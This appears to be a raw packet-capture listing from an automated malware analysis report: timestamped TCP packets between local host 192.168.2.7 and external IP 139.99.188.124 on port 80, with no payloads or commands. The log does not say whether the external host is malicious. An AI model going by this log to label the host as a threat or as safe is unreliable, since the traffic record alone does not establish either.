                                                                                        Dec 18, 2024 20:55:46.519453049 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.520294905 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.520303011 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.520309925 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.520317078 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.520339012 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.521173000 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.521179914 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.521193027 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.521472931 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.521986961 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.521996021 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.522007942 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.522047043 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.522829056 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.522838116 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.522850037 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.522856951 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.522882938 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.523701906 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.523710966 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.523718119 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.523822069 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.524535894 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.524590015 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.524597883 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.524691105 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.525501013 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.525509119 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.525521040 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.525527954 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.525557995 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.526335955 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.526344061 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.526356936 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.526392937 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.527146101 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.527153969 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.527167082 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.527204990 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.528064013 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.528072119 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.528084993 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.528091908 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.528124094 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.528906107 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.528913021 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.528918982 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.529294968 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.529711962 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.529720068 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.529726028 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.529769897 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.530579090 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.530587912 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.530594110 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.530600071 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.530626059 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.531441927 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.531450987 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.531462908 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.531517029 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.532335997 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.532342911 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.532356024 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.532393932 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.533174992 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.533183098 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.533195019 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.533202887 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.533236027 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.534044981 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.534051895 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.534065008 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.534101963 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.534825087 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.534882069 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.534888983 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.535041094 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.535774946 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.535783052 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.535789013 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.535795927 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.535860062 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.536663055 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.536670923 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.536684036 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.536782980 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.537537098 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.537544966 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.537559032 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.537596941 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.538335085 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.538342953 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.538353920 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.538361073 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.538393021 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.539189100 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.539196968 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.539210081 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.539246082 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.539340019 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.540018082 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.540025949 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.540040016 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.540086985 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.540915012 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.540923119 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.540935993 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.540942907 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.541003942 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.541003942 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.541870117 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.541877985 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.541889906 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.541924000 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.542653084 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.542660952 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.542666912 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.542704105 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.543905973 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.543914080 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.543926954 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.543934107 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.543979883 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.543979883 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.544456959 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.544465065 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.544476986 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.544531107 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.545188904 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.545197010 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.545202971 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.545242071 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.546071053 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.546077967 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.546083927 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.546091080 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.546138048 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.547027111 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.547034979 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.547040939 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.547081947 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.548676014 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.548686981 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.548692942 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.549120903 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.549604893 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.549756050 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.550404072 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.550411940 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.550417900 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.550455093 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.551235914 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.551265001 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.551328897 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.552083969 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.552092075 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.552103996 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.552135944 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.553814888 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.553827047 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.553834915 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.553966045 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.554658890 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.554666996 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.554680109 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.554721117 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.555479050 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.555526018 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.555830002 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.557399035 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.557406902 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.557419062 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.557425976 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.557478905 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.558244944 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.558250904 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.558290005 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.558928013 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.558973074 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.558979988 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.559062958 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.559804916 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.559819937 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.559830904 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.559855938 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.559883118 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.560765028 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.560774088 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.560791969 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.560800076 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.560827017 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.560866117 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.561743975 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.562551022 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.562596083 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.562608004 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.562781096 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.563497066 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.563504934 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.563515902 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.563523054 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.563551903 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.563570023 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.564275980 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.564284086 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.564296007 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.564331055 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.565155983 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.565164089 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.565176010 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.565294981 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.566087961 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.566097021 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.566143036 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.566982031 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.566993952 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.566999912 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.567033052 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.567795992 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.567953110 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.631269932 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.637353897 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.666641951 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.750937939 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.751048088 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.751068115 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.751076937 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.751132965 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.757431984 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.757833958 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.757873058 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.757879972 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.757880926 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.757936001 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.758692980 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.758733988 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.758743048 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.758802891 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.759583950 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.759639978 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.760185957 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.760191917 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.760199070 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.760243893 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.761030912 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.761076927 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.761766911 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.761775970 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.761781931 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.761789083 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.761912107 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.762609959 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.762615919 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.762722015 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.763381004 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.763387918 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.763400078 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.763427973 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.766576052 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.766583920 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.766596079 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.766700029 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.767414093 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.767437935 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.767518997 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.768255949 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.975358009 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:47.059307098 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:47.065395117 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:47.353962898 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:49.098890066 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:49.218449116 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:49.218574047 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:49.218987942 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:49.341490984 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.738563061 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.738723993 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.738729954 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.738744974 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.738898993 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.739296913 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.739304066 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.739321947 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.739535093 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.740082026 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.740091085 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.740102053 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.740406036 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.861265898 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.861274958 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.861463070 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.865530968 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.954952002 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.955080986 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.955108881 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.959213972 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.959820032 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.960637093 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.960951090 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.961204052 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.968925953 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.969166040 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.969887018 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.977799892 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.977966070 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.978141069 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.986198902 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.986349106 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.986553907 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.992192984 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.992382050 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.992947102 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.000572920 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.000786066 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.000925064 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.008979082 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.009238005 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.009582043 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.017422915 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.017663002 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.018021107 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.027981043 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.028163910 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.028812885 CET4979580192.168.2.7139.99.188.124
